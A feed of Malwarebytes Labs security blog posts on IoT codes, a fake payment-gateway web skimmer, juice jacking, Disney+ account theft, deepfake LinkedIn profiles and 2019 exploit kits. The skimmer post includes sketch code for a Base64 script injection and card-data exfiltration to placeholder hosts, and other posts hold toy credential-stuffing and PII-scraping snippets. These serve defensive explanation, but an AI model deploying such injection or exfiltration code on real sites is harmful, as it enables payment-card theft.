It’s not just the US trying to get a grip on IoT. Australia just pushed out the voluntary code of practice: securing the Internet of Things for consumers [PDF]. Spread across 13 principles, it seems to be significantly more in-depth than the US bill, which so far leaves a lot of areas up for debate. The 13 principles tackle communication security, updates, the ability to easily scrub personal data, and more besides.

Of course, we should temper our expectations somewhat. The US bill goes live in two states only, and there doesn’t seem to be much (or any!) information with regards to punishment, fines, or anything else.

Additionally, you yourself as a consumer can’t do anything off the back of the bill directly. It would have to be the California Attorney General or similar stepping up to the plate. On the other hand, as impressive as the Australian code is—and it is still under consultation—it’s currently only voluntary.

Even so, getting people in a position of authority to think about these issues is important, and at the very least these guides will help people at home to make considered, informed decisions about the technology they allow into their homes on a daily basis. Some good first steps, then, but we have a long way to go.

The post IoT bills and guidelines: a global response appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Web skimmer phishes credit card data via rogue payment service platform

Malwarebytes - Thu, 11/21/2019 - 17:30

Heading into the holiday shopping season, we have been tracking increased activity from a threat group registering domains for skimming and phishing campaigns. While most of the campaigns implemented a web skimmer in the typical fashion—grabbing and exfiltrating data from a merchant’s checkout page to an attacker-controlled server—a new attack scheme has emerged that tricks users into believing they’re using a payment service platform (PSP).

PSPs are quite common and work by redirecting the user from a (potentially compromised) merchant site onto a secure page maintained by the payment processing company. This is not the first time a web skimmer has attempted to interfere with PSPs, but in this case, the attackers created a completely separate page that mimics a PSP.

By blending phishing and skimming together, threat actors developed a devious scheme, as unaware shoppers will leak their credentials to the fraudsters without thinking twice.

Standard skimmer

Over the past few months, we’ve tracked a group that has been active with web skimmer and phishing templates. As web security firm Sucuri noted, most of the domains are registered via the medialand.regru@gmail[.]com email address.

Many of their skimmers are loaded as a fake Google Analytics library called ga.js. One of several newly-registered domain names we came across had a skimmer that fit the same template, hosted at payment-mastercard[.]com/ga.js.

Figure 1: Simple skimmer based on previous template

This malicious ga.js file is injected into compromised online shops by inserting a one line piece of code containing the remote script in Base64 encoded form.

Figure 2: A JavaScript library from a compromised shop injected with the skimmer
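The injection technique can be reconstructed in a few lines. This is a hypothetical sketch: the domain is a placeholder, not the actual skimmer infrastructure, and the encoding round trip just shows why a Base64 blob hides the remote script from a casual code review.

```python
import base64

# The remote script tag is stored Base64-encoded, so all that appears in
# the compromised library is a short, innocuous-looking one-liner.
payload = '<script src="https://evil.example/ga.js"></script>'
encoded = base64.b64encode(payload.encode()).decode()

# Roughly what a defender finds in the infected file (atob() is the
# browser's built-in Base64 decoder):
injected_line = f"document.write(atob('{encoded}'))"

# Decoding the blob recovers the hidden remote script tag.
assert base64.b64decode(encoded).decode() == payload
```

Nothing in `injected_line` mentions the skimmer domain in plain text, which is exactly the point of the obfuscation.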

However, one thing we noticed is that the payment-mastercard[.]com domain was also hosting a completely different kind of skimmer that at first resembled a phishing site.

Phish-like skimmer

This skimmer is interesting because it looks like a phishing page copied from an official template for CommWeb, a payments acceptance service offered by Australia’s Commonwealth Bank.

Figure 3: Fraudulent and legitimate payment gateways shown side by side

As the text reads “Your details will be sent to and processed by The Commonwealth Bank of Australia and will not be disclosed to the merchant,” this is not a login page designed to phish credentials, but rather a pretend payment gateway service.

The attackers have crafted it specifically for an Australian store running the PrestaShop Content Management System (CMS), exploiting the fact that it accepts payments via the Commonwealth Bank.

Figure 4: Modes of payments accepted by the store

The scheme consists of swapping the legitimate e-banking page with the fraudulent one in order to collect the victims’ credit card details. We also noticed that the fake page did something we don’t always see with standard skimmers in that it checked that all fields were valid and informed the user if they weren’t.

Figure 5: Fake payment gateway page shown with its JavaScript that exfiltrates the data

Here’s how this works:

  • The fraudulent page will collect the credit card data entered by the victim and exfiltrate it via the payment-mastercard[.]com/ga.php?analytic={based64} URL
  • Right after, the victim is redirected to the real payment processor via the merchant’s migs_vpc module (MIGs VPC is an integrated payment service)
  • The legitimate payment site for Australia’s Commonwealth Bank is loaded and displays the total amount due for the purchase.
Figure 6: Web traffic showing data exfiltration process followed by redirect to legitimate PSP
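The exfiltration step above can be sketched as follows. Everything here is illustrative: the card data is dummy test data, and the domain is a placeholder standing in for the attacker-controlled host. It shows how stolen form fields ride out of the page disguised as an analytics request.

```python
import base64
import json
from urllib.parse import quote

# Stolen form fields are serialized, Base64-encoded, and smuggled out as a
# query parameter on an analytics-looking request (dummy data only).
stolen = {"cc_number": "4111111111111111", "cvv": "123", "expiry": "12/22"}
blob = base64.b64encode(json.dumps(stolen).encode()).decode()
exfil_url = f"https://skimmer.example/ga.php?analytic={quote(blob)}"

# On the attacker's server, the same blob decodes straight back to the data.
assert json.loads(base64.b64decode(blob)) == stolen
```

To network monitoring, the request looks like one more tracking beacon, which is why this pattern blends in so well on busy checkout pages.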

Here’s the final (and legitimate) payment page displayed to the victim. Note how the total amount due from the purchase on the compromised shop is carried over. This is done by creating a unique session ID and reading browser cookies.

Figure 7: Legitimate payment gateway page used for actual payment of goods

Web skimming in all different forms

Web skimming is a profitable criminal enterprise that shows no sign of slowing down, sparking authorities’ attention and action plans.

Externalizing payments shifts the burden and risk to the payment company such that even if a merchant site were hacked, online shoppers would be redirected to a different site (i.e. Paypal, MasterCard, Visa gateways) where they could enter their payment details securely.

Unfortunately, fraudsters are becoming incredibly creative in order to defeat those security defenses. By combining phishing-like techniques and inserting themselves in the middle, they can fool everyone.

Malwarebytes users are already protected against this particular scheme as the fraudulent infrastructure was already known to us.

Indicators of Compromise



The post Web skimmer phishes credit card data via rogue payment service platform appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: juice jacking

Malwarebytes - Thu, 11/21/2019 - 16:00

When your battery is dying and you’re nowhere near a power outlet, would you connect your phone to any old USB port? Joyce did, and her mobile phone got infected. How? Through a type of cyberattack called “juice jacking.” Don’t be like Joyce.

Although Joyce and her infected phone are hypothetical, juice jacking is technically possible. The attack uses a charging port or infected cable to exfiltrate data from the connected device or upload malware onto it. The term was first used by Brian Krebs in 2011 after a proof of concept was conducted at DEF CON by Wall of Sheep. When users plugged their phones into a free charging station, a message appeared on the kiosk screen saying:

“You should not trust public kiosks with your smart phone. Information can be retrieved or downloaded without your consent. Luckily for you, this station has taken the ethical route and your data is safe. Enjoy the free charge!”

As peak holiday travel season approaches, officials have issued public warnings about charging phones via USB using public charging stations in airports and hotels, as well as pluggable USB wall chargers, which are portable charging devices that can be plugged into an AC socket. However, this attack method has not been documented in the wild, outside of a few unconfirmed reports on the east coast and in the Washington, DC, area.

Instead of worrying about juice jacking this holiday season, we recommend you follow our guidance on best cybersecurity practices while traveling. We’ve also written articles on how to protect your Android, as well as how to protect your iOS phone.

Still, it’s best to be aware of potential modes of cyberattack—you never know what will trigger the transformation of the hypothetical to the real. To avoid inadvertently infecting your mobile device while charging your phone in public, learn more about how these attacks could happen and what you can do to prevent them.

How would juice jacking work?

As you may have noticed, when you charge your phone through the USB port of your computer or laptop, this also opens up the option to move files back and forth between the two systems. That’s because a USB port is not simply a power socket. A regular USB connector has five pins, where only one is needed to charge the receiving end. Two of the others are used by default for data transfers.

USB connection table courtesy of Sunrom

Unless you have made changes in your settings, the data transfer mode is disabled by default, except on devices running older Android versions. The connection is only visible on the end that provides the power, which in the case of juice jacking is typically not the device owner. That means, anytime a user connects to a USB port for a charge, they could also be opening up a pathway to move data between devices—a capability threat actors could abuse to steal data or install malware.

Types of juice jacking

There are two ways juice jacking could work:

  • Data theft: During the charge, data is stolen from the connected device.
  • Malware installation: As soon as the connection is established, malware is dropped on the connected device. The malware remains on the device until it is detected and removed by the user.
Data theft

In the first type of juice-jacking attack, cybercriminals could steal any and all data from mobile devices connected to charging stations through their USB ports. But there’s no hoodie-wearing hacker sitting behind the controls of the kiosk. So how would they get all your data from your phone to the charging station to their own servers? And if you charge for only a couple minutes, does that save you from losing everything?

Make no mistake, data theft can be fully automated. A cybercriminal could breach an unsecured kiosk using malware, then drop an additional payload that steals information from connected devices. There are crawlers that can search your phone for personally identifiable information (PII), account credentials, and banking-related or credit card data in seconds. There are also many malicious apps that can clone all of one phone’s data to another phone, using a Windows or Mac computer as a middleman. So, if that’s what’s hiding on the other end of the USB port, a threat actor could get all they need to impersonate you.
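To see how little effort automated PII crawling takes, here is a toy illustration: a few regular expressions swept over captured text. Real tooling is far broader and smarter; these patterns are simplified examples invented for this sketch, not taken from any actual malware.

```python
import re

# Simplified detectors for a few common PII shapes (illustrative only).
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(r"\b(?:\d[ -]?){15}\d\b"),  # crude 16-digit match
}

def scan(text):
    """Return every pattern that matched, mapped to its hits."""
    hits = {label: pat.findall(text) for label, pat in PATTERNS.items()}
    return {label: found for label, found in hits.items() if found}
```

A single pass over a message store or contacts dump with patterns like these is enough to triage which devices are worth a criminal's further attention.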

Cybercriminals are not necessarily targeting specific, high-profile users for data theft, either—though a threat actor would be extremely happy (and lucky) to fool a potential executive or government target into using a rigged charging station. However, the chances of that happening are rather slim. Instead, hackers know that our mobile devices store a lot of PII, which can be sold on the dark web for profit or re-used in social engineering campaigns.

Malware installation

The second type of juice-jacking attack would involve installing malware onto a user’s device through the same USB connection. This time, data theft isn’t always the end goal, though it often takes place in the service of other criminal activities. If threat actors were to steal data through malware installed on a mobile device, it wouldn’t happen upon USB connection but instead take place over time. This way, hackers could gather more and varied data, such as GPS locations, purchases made, social media interactions, photos, call logs, and other ongoing processes.

There are many categories of malware that cybercriminals could install through juice jacking, including adware, cryptominers, ransomware, spyware, or Trojans. In fact, Android malware nowadays is as versatile as malware aimed at Windows systems. While cryptominers mine a mobile phone’s CPU/GPU for cryptocurrency and drain its battery, ransomware freezes devices or encrypts files for ransom. Spyware allows for long-term monitoring and tracking of a target, and Trojans can hide in the background and serve up any number of other infections at will.

Many of today’s malware families are designed to hide from sight, so it’s possible users could be infected for a long time and not know it. Symptoms of a mobile phone infection include a quickly-draining battery life, random icons appearing on your screen of apps you didn’t download, advertisements popping up in browsers or notification centers, or an unusually large cell phone bill. But sometimes infections leave no trace at all, which means prevention is all the more important.

How to avoid juice jacking

The first and most obvious way to avoid juice jacking is to stay away from public charging stations or portable wall chargers. Don’t let the panic of an almost drained battery get the best of you. I’m probably showing my age here, but I can keep going without my phone for hours. I’d rather not see the latest kitty meme if it means compromising the data on my phone.

If going without a phone is crazy talk and a battery charge is necessary to get you through the next leg of your travels, using a good old-fashioned AC socket (plug and outlet) will do the trick. No data transfer can take place while you charge—though it may be hard to find an empty outlet. While traveling, make sure you have the correct adapter for the various power outlet systems along your route. Note there are 15 major types of electrical outlet plugs in use today around the globe.

Other non-USB options include external batteries, wireless charging stations, and power banks, which are devices that can be charged to hold enough power for several recharges of your phone. Depending on the type and brand of power bank, they can hold between two and eight full charges. Power banks with a high capacity are known to cost more than US$100, but offer the option to charge multiple devices without having to look for a suitable power outlet.

If you still want the option to connect via USB, USB condoms are adaptors that allow the power transfer but don’t connect the data transfer pins. You can attach them to your charging cable as an “always on” protection.

Image courtesy of

Using such a USB data blocker, or “juice-jack defender” as they are sometimes called, will always prevent accidental data exchange when your device is plugged into another device with a USB cable. This makes it a welcome travel companion, and it will only set you back US$10–$20.

Checking your phone’s USB preference settings may help, but it’s not a foolproof solution. There have been cases where data transfers took place despite the “no data transfer” setting.

Finally, avoid using any charging cables and power banks that seem to be left behind. You can compare this trick to the “lost USB stick” in the parking lot. You know you shouldn’t connect those to your computer, right? Consider any random technology left behind as suspect. Your phone will thank you for it.

Stay safe, everyone!

The post Explained: juice jacking appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Disney+ security and service issues: Here’s what we know so far

Malwarebytes - Wed, 11/20/2019 - 18:11

The long wait is over.

Disney+, the new video-streaming service to rival Netflix and Amazon Prime, debuted last week to much fanfare, racking up 10 million subscribers within a single day of launch. Unfortunately, it wasn’t the kind of splash the majority of users predicted, as they were met with connection and performance issues out the gate—soon to be followed by reports of hacked accounts being stolen and sold on the dark web.

The Disney+ problem trend line, outage heat map, and most reported problems, according to Downdetector.

A snapshot of some of the hitches users are encountering (Courtesy of Downdetector Australia)

Disney, for its part, didn’t expect to be overwhelmed with technical complications driven by exceedingly high consumer demand. Nor does it admit to suffering a data breach, despite user complaints of being frozen out of their accounts or seeing their credentials changed without approval.

Things continue to unfold as we speak, but here’s what we currently know about the Disney+ security issues.

Disney+ user credentials in the dark web

For as little as US$3, interested buyers lurking on the dark web can acquire a trove of stolen Disney+ accounts, which popped up in several underground markets mere hours after launch last week. According to an investigation conducted by Catalin Cimpanu of ZDNet, “Hacking forums have been flooded with Disney+ accounts, with ads offering access to thousands of account credentials.” They also saw hacked accounts being offered for free use and for sharing.

The pitch to free Disney+ accounts (Courtesy of ZDNet)

The BBC, with the help of an unnamed cybersecurity researcher, further confirmed the sale of thousands of Disney+ accounts.

No smoking gun…yet

As of presstime, Disney denies that there was a data breach of its streaming platform, and no one has pointed to a root cause on how Disney+ accounts were hacked. However, there are smart speculations.

Users with hacked accounts may have used recycled credentials. And this won’t be a surprise if it’s true. According to a Google survey, two in three Internet users reuse their passwords—some for multiple accounts, some for all of them.

Armed with leaked credentials from multiple data breaches, hackers likely used credential stuffing—the automated entering of compromised username-password combinations into account forms, in this case Disney+’s. The attack works on the assumption that users entered the exact same combo on that service.
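Credential stuffing reduces to a very simple loop, which is why it scales so well. The sketch below is purely conceptual: all names and passwords are invented, and real attacks replay millions of leaked combos through automated tooling against live login forms, not a local dictionary.

```python
# Leaked username/password pairs from earlier, unrelated breaches.
leaked_combos = [
    ("alice@example.com", "hunter2"),   # Alice reused this password
    ("bob@example.com", "qwerty"),      # Bob used a different one here
]

# Stand-in for the target service's credential store (hypothetical).
target_accounts = {
    "alice@example.com": "hunter2",
    "bob@example.com": "Xk9!uniquePerSite",
}

def stuff(combos, accounts):
    """Return the leaked pairs that still grant access -- i.e. reused ones."""
    return [(user, pw) for user, pw in combos if accounts.get(user) == pw]

compromised = stuff(leaked_combos, target_accounts)
# Only Alice's reused credential succeeds; Bob's unique password defeats it.
```

The takeaway is that a unique password per site turns a breach elsewhere into a non-event for your other accounts.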

Disney+ also allows for password sharing, but its user interface doesn’t include an option to easily log others out from account access. In addition, it doesn’t require two-factor authentication, a security measure that could have prevented recycled credentials from being an issue.

Read: Are hackers gonna hack anymore? Not if we keep reusing passwords

Hackers may have guessed user passwords correctly. Another method hackers can use is password guessing. It seems silly, but this works, too, because many users are still so bad at making strong passwords and opt for easy-to-remember ones like “12345,” “password,” and “qwerty.” Add in the difficulty of entering complex passwords via TV remote, and that makes this scenario even more plausible.

ZDNet noted, however, that even consumers who used unique passwords claimed their accounts were stolen. In that case, it is possible that…

Disney+ really was hacked or their user database leaked online. Not all companies fess up to being hacked right away, especially if they are in the middle of investigating the culprit/root cause. In addition, Disney has a documented history of cutting corners on investing in technology infrastructure. It’s possible their databases were not properly secured and credentials actually leaked online, allowing threat actors to simply grab the information they needed without having to breach at all.

Users may actually have malware on their systems. It’s not a long shot, considering we have nasties like spyware and keyloggers in the wild. So many houses are Internet-connected through streaming services and other IoT devices, such as home assistants, thermostats, doorbell, security, and lock systems. These networked devices are notoriously vulnerable to attack.

Users may have been phished. Although there are no reports of an active phishing campaign against Disney+ users, we have seen a well-timed, professionally put-together phishing email fool even the cleverest of Internet users.

A Disney+ account lockdown is a security precaution

Some users complain on social media that they have been locked out of the Disney+ service. While this may suggest that hackers have successfully changed the emails and passwords linked to affected accounts, it could also suggest that a security precaution Disney had put in place is working: when its system sees suspicious activity on an account during the login process, it locks that account down.

Of course, until Disney customer service confirms this to be true for affected users, we can only assume that finding yourself locked out is the streaming service’s way of protecting your account from getting compromised. Unfortunately, Disney made the mistake of linking its new streaming service with the rest of its platforms, freezing some users out of their other Disney services as well.

At the end of the day, there’s good news

There is big room for improvement, for both the users and Disney+.

Users should take this incident as a reminder of the importance of good password hygiene, such as creating unique and complex credentials and never reusing them. Chances are, online criminals already have some of your old passwords in their stash, so why continue to use them?

Heed what others have already advised and start using a password manager. There are a lot of options out there, so take your time and make sure you pick the one you think is for you. Because Disney+ doesn’t have another layer of account protection in place, such as two-factor authentication (2FA), it is more crucial than ever to use a randomly generated, long password that you don’t have to memorize.
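Under the hood, generating such a credential is trivial, which is part of the argument for letting a password manager do it. A minimal sketch, using Python's cryptographically secure `secrets` module; the length and alphabet here are illustrative choices, not a universal standard.

```python
import secrets
import string

# Characters to draw from: letters, digits, and a handful of symbols.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*-_"

def generate_password(length=24):
    """Return a long, random, per-site credential you never memorize."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))
```

A 24-character password drawn from this alphabet is far beyond the reach of both guessing and credential stuffing, provided it is never reused.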

Speaking of passwords, it’s also good practice to avoid sharing them with anyone, including friends and family members. Yes, Disney tolerates the practice of password sharing, but for security’s sake, it’s best not to. At the very least, consider introducing a little bit of friction in keeping your accounts secure. And this is true not just for Disney+ account holders.

There is no shortage of great suggestions for Disney+ to increase its security, too. Apart from implementing and mandating the use of 2FA (especially for linked Walt Disney accounts), the streaming service should also have provided a feature where a user can view other devices connected to their Disney+ account. Some also suggest that, since Disney also owns Hulu, Disney+ should have a feature that allows account holders to log everyone out in the event of a hack.

Disney+ is set to roll out in European countries and the UK in March 2020. Hopefully by that time, both users and Disney will have done more to ensure their accounts are secured, beefier protections are enabled, and performance issues are ironed out.

The post Disney+ security and service issues: Here’s what we know so far appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Deepfakes and LinkedIn: malign interference campaigns

Malwarebytes - Wed, 11/20/2019 - 16:00

Deepfakes haven’t quite lost the power to surprise, but given their wholesale media saturation in the last year or so, there’s a sneaking suspicion in some quarters that they may have missed the bus. When people throw a fake Boris Johnson or Jeremy Corbyn online these days, the response seems to be fairly split between “Wow, that’s funny” and barely even amused.

You may well be more likely to chuckle at people thinking popular Boston Dynamics spoof “Bosstown Dynamics” videos are real—but that’s exactly what cybercriminals are banking on, and where the real malicious potential of deepfakes may lie.

What happens when a perfectly ordinary LinkedIn profile features a deepfake-generated image of a person who doesn’t exist? Everyone believes the lie.

Is the sky falling? Probably not.

The two main markets cornered by deepfakes at time of writing are fake pornography clips and a growing industry in digital effects, which are a reasonable imitation of low budget TV movies. In some cases, a homegrown effort has come along and fixed a botched Hollywood attempt at CGI wizardry. Somehow, in an age of awful people paying for nude deepfakes of anyone they choose, and the possibility of oft-promised but still not materialised political shenanigans, the current ethical flashpoint is whether or not to bring James Dean back from the dead.

Despite this, the mashup of politics and technology continues to simmer away in the background. At this point, it is extremely unlikely you’ll see some sort of huge world event (or even several small but significant ones) being impacted by fake clips of world leaders talking crazy—they’ll be debunked almost instantly. That ship has sailed. That deepfakes came to prominence primarily via pornography subreddits and people sitting at home rather suggests they got the drop on anyone at a nation-state level.

When it comes to deepfakes, I’ve personally been of the “It’s bad, but in social engineering terms, it’s a lot of work for little gain” persuasion. I certainly don’t subscribe to the sky-is-about-to-cave-in model. The worst areas of deepfakery I tend to see are where it’s used as a basis to push Bitcoin scams. But that doesn’t mean there isn’t potential for worse.

LinkedIn, deepfakes, and malign influence campaigns

With this in mind, I was fascinated to see “The role of deepfakes in malign influence campaigns” published by StratCom in November, which primarily focused on the more reserved but potentially devastating form of deepfakes shenanigans. It’s not fake Trump, it isn’t pretend Boris Johnson declaring aliens are invading; it’s background noise level interference designed to work its silent way up a chain of command.

I was particularly taken by the comment that “doom and gloom” assessments from experts had made way for a more moderate and skeptical approach. In other words, the moment marketers, YouTube VFX fans, and others tried to pry deepfake tech away from pornography pushers, it became somewhat untenable to make big, splashy fakes with sinister intentions. Instead, the battle raged behind the scenes.

And that’s where Katie Jones stepped up to the plate.

Who is Katie Jones?

In the grand scheme of things, nobody. Another fake account in a never-ending wave of fake accounts stretching through years of Facebook clones and Myspace troll “baking sessions” where hundreds would be rolled out the door on the fly. The only key difference is that Katie’s LinkedIn profile picture was a computer-generated work of fiction.

The people “Katie” had connected to were a little inconsistent, but they did include an awful lot of people working in and around government, policy, academia, and…uh…a fridge freezer company. Not a bad Rolodex for international espionage.

Nobody admitted talking to Katie, though this raises the question of whether anyone who fell for the ruse would hold up their hand after the event.

While we can speculate on why the profile was created—social engineering campaign, test run for nation-state spying (quickly abandoned once discovered, similar to many malware scams), or even just some sort of practical joke—what really amuses me is the possibility that someone just randomly selected a face from a site like this and had no idea of the chaos that would follow.

Interview with a deepfake sleuth

Either way, here comes Munira Mustaffa, the counter-intelligence analyst who first discovered the LinkedIn deepfake sensation known as Katie. Mustaffa took some time to explain to me how things played out:

A contact of mine, a well-known British expert on Russian defence and military matters, was immediately suspicious about an attempted LinkedIn connection. He scanned her profile, and reverse searched her profile photo, which turned up zero results. He turned to me to ask me to look into her, and I, too, found nothing.

This is unusual for someone claiming to be a Russia & Eurasia Fellow for an organisation like Center for Strategic and International Studies (CSIS), because you would expect someone in her role to have some publication history at least. The security world is a small one for us, especially if you’re a policy wonk working on Russia matters. We both already knew Katie Jones did not exist, and this suspicion was confirmed when he checked with CSIS.

I kept coming back to the photo. How could you have a shot like that but not have any sort of digital footprint? If it had been stolen from an online resource, it’d be almost impossible. At this point, I started to notice the abnormalities—you must understand my thought process as someone who does photography for a hobby and uses Photoshop a lot.

For one thing, there was a gaussian blur on her earlobe. Initially, I thought she’d Photoshopped her ear, but that didn’t check out. Why would someone Photoshop their earlobe? 

Once I started to notice the anomalies, it was like everything suddenly started to click into place right before my eyes. I started to notice the halo around her hair strands. How her eyes were not aligned. The odd striations and blurring. Then there were casts and artefacts in the background. To casual observers, they would look like bokeh. But if you have some experiences doing photography, you would know instantly they were not bokeh.

They looked pulled—like someone had played with the Liquify tool on Photoshop but dialed up the brush to extreme. I immediately realised that what I was looking at was not a Photoshopped photo of a woman. In fact, it was an almost seamless blending of one person digitally composited and superimposed from different elements.

I went on and started to generate my own deepfakes. After examining half a dozen or so, I started picking out patterns and anomalies, and I went back to “Katie” to study it further. They were all present.

Does it really matter?

In some ways, possibly not. The only real benefit to using a deepfake profile pic is that suspicious people won’t get a result in Google reverse search, TinEye, or any other similar service. But anyone doing that for LinkedIn connections or other points of contact probably won’t be spilling the beans on anything they shouldn’t be anyway.
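Reverse image search works by comparing compact perceptual fingerprints of images, which is exactly why a freshly generated face returns nothing. The idea can be sketched in a few lines of Python—a simplified “average hash” over an already-resized grayscale grid, not the actual algorithm TinEye or Google use:

```python
def average_hash(pixels):
    """Compute a simple perceptual 'average hash' of a grayscale image.

    `pixels` is a 2D list of grayscale values (e.g. already resized to 8x8).
    Each bit is 1 if that pixel is brighter than the image's mean, so similar
    images yield similar bit strings.
    """
    flat = [p for row in pixels for p in row]
    mean = sum(flat) / len(flat)
    bits = 0
    for p in flat:
        bits = (bits << 1) | (1 if p > mean else 0)
    return bits


def hamming(a, b):
    """Count differing bits: a small distance means a near-duplicate image."""
    return bin(a ^ b).count("1")
```

A search engine indexes billions of fingerprints like these; a GAN-generated face has no near neighbour in that index, so the query comes back empty.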

For everyone else, the risk is there and just enough to make it all convincing. It’s always been pretty easy to spot someone using stock photography model shots for bogus profile pics. The threat from deepfaked snapshots comes from their sheer, complete and utter ordinariness. Using all that processing power and technology to carve what essentially looks like a non-remarkable human almost sounds revolutionary in its mundaneness.

But ask any experienced social engineer, and they’ll tell you mundane sells. We believe the reality that we’re presented. You’re more likely to tailgate your way into a building dressed as an engineer, or carrying three boxes and a coffee cup, than dressed as a clown or wearing an astonishingly overt spycoat and novelty glasses.

Spotting a fake

Once you spend a little time looking at the fake people generated on sites such as this, there are multiple telltale signifiers that the image has been digitally constructed. We go back to Mustaffa:

Look for signs of tampering on the photo by starting with the background. If it appears to be somewhat neutral in appearance, then it’s time to look for odd noises/disturbances like streaky hair or earlobes.

I decided to fire up a site where you guess which of two faces is real and which is fake. In my first batch of shots, you’ll notice the noise/disturbance so common with AI-generated headshots—it resembles the kind of liquid-looking smear effect you’d get on old photographs you hadn’t developed properly. Check out the neck in the below picture:

On a similar note, look at the warping next to the computer-generated man’s hairline:

These effects also appear in backgrounds quite regularly. Look to the right of her ear:

Backgrounds are definitely a struggle for these images. Look at the bizarre furry effect running down the edge of this tree:

Sometimes the tech just can’t handle what it’s trying to do properly, and you end up with…whatever that’s supposed to be…on the right:

Also of note are the sharply-defined lines on faces around the eyes and cheeks. Not always a giveaway, but helpful to observe alongside other errors.

Remember in ye olden days when you’d crank up certain sliders in image editing tools like sharpness to the max and end up with effects similar to the one on this ear?

Small children tend to cause problems, and so too do things involving folds of skin, especially where trying to make a fake person look a certain age is concerned. Another telltale sign you’re dealing with a fake are small sets of incredibly straight vertical lines on or around the cheek or neck areas. Meanwhile, here are some entirely unconvincing baby folds:
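Many of these giveaways—smears, unnaturally smooth patches, streaky halos—show up statistically as regions whose local texture is too flat. As a purely illustrative heuristic (emphatically not a deepfake detector), local variance over a small window can flag suspiciously smooth areas in a grayscale image:

```python
def local_variance(pixels, x, y, radius=1):
    """Variance of grayscale values in a small window centred on (x, y)."""
    ys = range(max(0, y - radius), min(len(pixels), y + radius + 1))
    xs = range(max(0, x - radius), min(len(pixels[0]), x + radius + 1))
    window = [pixels[j][i] for j in ys for i in xs]
    mean = sum(window) / len(window)
    return sum((p - mean) ** 2 for p in window) / len(window)


def smooth_regions(pixels, threshold=1.0):
    """Coordinates whose neighbourhood is suspiciously flat.

    Real photo backgrounds and hair carry fine-grained noise; a cluster of
    near-zero-variance points in such areas is one crude hint of smearing.
    """
    return [
        (x, y)
        for y in range(len(pixels))
        for x in range(len(pixels[0]))
        if local_variance(pixels, x, y) < threshold
    ]
```

In practice, you would compare the flagged regions against what the image should contain—flat sky is fine, flat hair is not—which is precisely the judgment call a practiced human eye makes instantly.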

There are edge cases, but in my most recent non-scientific test on Which face is real, I was able to guess correctly no fewer than 50 times in a row who was real before I got bored and gave up. I once won 50 games of Tekken in a row at a university bar and let me tell you, that was an awful lot more difficult. Either I’m some sort of unstoppable deepfake-detecting marvel, or it really is quite easy to spot them with a bit of practice.

Weeding out the fakers

Deepfakes, then, are definitely here to stay. I suspect they’ll continue to cause the most trouble in their familiar stomping grounds: fake porn clips of celebrities, and paid clips of non-celebrities that can also be used to threaten or blackmail victims. Occasionally, we’ll see another weightless robot turning on its human captors, and some people will fall for it.

Elsewhere, in connected networking profile land, we’ll occasionally come across bogus profiles and then it’s down to us to make use of all that OPSEC/threat intel knowledge we’ve built up to scrutinize the kind of roles we’d expect to be targeted: government, policy, law enforcement, and the like.

We can’t get rid of them, and something else will be along soon enough to steal what thunder remains, but we absolutely shouldn’t fear them. Instead, to lessen their potential impact, we need to train ourselves to tell the fake from the real.

Thanks to Munira for her additional commentary.

The post Deepfakes and LinkedIn: malign interference campaigns appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: fall 2019 review

Malwarebytes - Tue, 11/19/2019 - 18:08

Despite a slim browser market share, Internet Explorer is still being exploited in fall 2019 in a number of drive-by download campaigns. Perhaps even more surprising, we’re seeing new exploit kits emerge.

Based on our telemetry, these drive-bys are happening worldwide (with the exception of a few that are geo-targeted) and are fueled by malvertising most often found on adult websites.

Even though the weaponized vulnerabilities remain fairly old, we’ve observed a growing number of exploit kits go for fileless attacks instead of the more traditional method of dropping a payload on disk. This is an interesting trend that makes sample sharing more difficult and possibly increases infection rates by evading some security products.

Fall 2019 overview
  • Spelevo EK
  • Fallout EK
  • Magnitude EK
  • RIG EK
  • GrandSoft EK
  • Underminer EK
  • KaiXin EK
  • Purple Fox EK
  • Capesand EK

Internet Explorer’s CVE-2018-8174 and Flash Player’s CVE-2018-15982 are the most common vulnerabilities, while the older CVE-2018-4878 (Flash) is still used by some EKs. It’s worth noting we’re seeing some exploit kits no longer using Flash, while others are relying on much older vulnerabilities.

Spelevo EK

Spelevo EK is one of these newer exploit kits that we see on a regular basis via malvertising campaigns. There hasn’t been any major change since our last review and the threat actors still rely on the domain shadowing technique to generate new URLs.

Payloads seen: PsiXBot, Gootkit, Maze

Fallout EK

Fallout EK stands apart from the rest with its obfuscation techniques, as well as various fingerprinting checks. It also implemented the Diffie-Hellman key exchange to prevent offline replays by security analysts.

Payloads seen: Sodinokibi, AZORult, Kpot, Raccoon, Danabot

Magnitude EK

Magnitude EK hasn’t changed much in the past few months. The same Magnigate infrastructure is being used to redirect users to fake cryptocurrency domains. The payload remains Magniber ransomware delivered in fileless mode.

Payload seen: Magniber


RIG EK

Recently, RIG EK seems to have dropped its Flash Player exploit and instead relies solely on Internet Explorer. One active campaign is HookAds, which uses a fake gaming website to redirect to the exploit kit.

Payloads seen: Smoke Loader, Sodinokibi, Paradise, Antefrigus

GrandSoft EK

GrandSoft EK is not as commonly observed this fall, and appears to have limited payload distribution. It is known to focus on the distribution of the Ramnit Trojan.

Payload seen: Ramnit

Underminer EK

Underminer EK is one of the more interesting exploit kits on the market, due to its unusual way of delivering its Hidden Bee payload. Not only is it fileless, but it is packed in a particular way that hints that the exploit kit and malware developer are one and the same.

Payload seen: Hidden Bee

KaiXin EK

KaiXin EK is a more obscure exploit kit we seldom run into, perhaps because it seems to target the Asian market. However, it appears to still be around on the same infrastructure.

Payload seen: Dupzom

Purple Fox EK

Purple Fox was described previously by Trend Micro and is an interesting drive-by framework that loads fileless malware. While it was once loaded via RIG EK, it is now seen on its own. For this reason, we believe it can be called an exploit kit as well.

Payload seen: Kpot

Capesand EK

Capesand EK is the latest exploit kit to have surfaced, although it is based on code from an old EK called Demon Hunter. It was spotted in a particular malvertising campaign, perhaps suggesting the work of a single malware author distributing their own payload.

Payload seen: NjRAT

Maintaining a foothold

It’s interesting to see exploit kits alive and kicking, despite relying on aging vulnerabilities and the shrinking user bases of both Internet Explorer and Flash Player.

